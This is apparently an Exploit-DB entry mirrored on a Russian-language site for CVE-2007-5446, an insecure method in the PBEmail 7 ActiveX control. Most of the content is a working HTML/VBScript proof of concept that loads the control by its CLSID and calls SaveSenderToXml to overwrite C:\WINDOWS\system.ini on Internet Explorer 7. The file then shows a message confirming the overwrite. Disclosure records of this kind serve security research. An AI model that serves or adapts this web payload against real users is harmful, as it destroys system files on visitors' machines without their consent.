- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4526
- Проверка EDB
-
- Пройдено
- Автор
- KATATAFISH
- Тип уязвимости
- REMOTE
- Платформа
- WINDOWS
- CVE
- cve-2007-5446
- Дата публикации
- 2007-10-12
HTML:
<pre>
<b>Found by</b>: Katatafish (karatatata{at}hush{dot}com)
<b>software</b>:PBEmail 7 ActiveX Edition
<b>Vendor:</b> http://www.perfectionbytes.com
<b>vulnerability</b>: Insecure method
SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
<b>Tested on Internet explorer 7 with Windows XP SP 2.</b>
<b>Thanks:</b> str0ke
</pre>
<object classid="clsid:30C0FDCB-53BE-4DB3-869D-32BF2DAD0DEC"
id="kat"></object>
<script language="vbscript">
kat.SaveSenderToXml "C:\WINDOWS\system.ini"
MyMsg = MsgBox ("Done! Your C:\WINDOWS\system.ini file should now
be overwriten.")
</script>
# milw0rm.com [2007-10-12]- Источник
- www.exploit-db.com
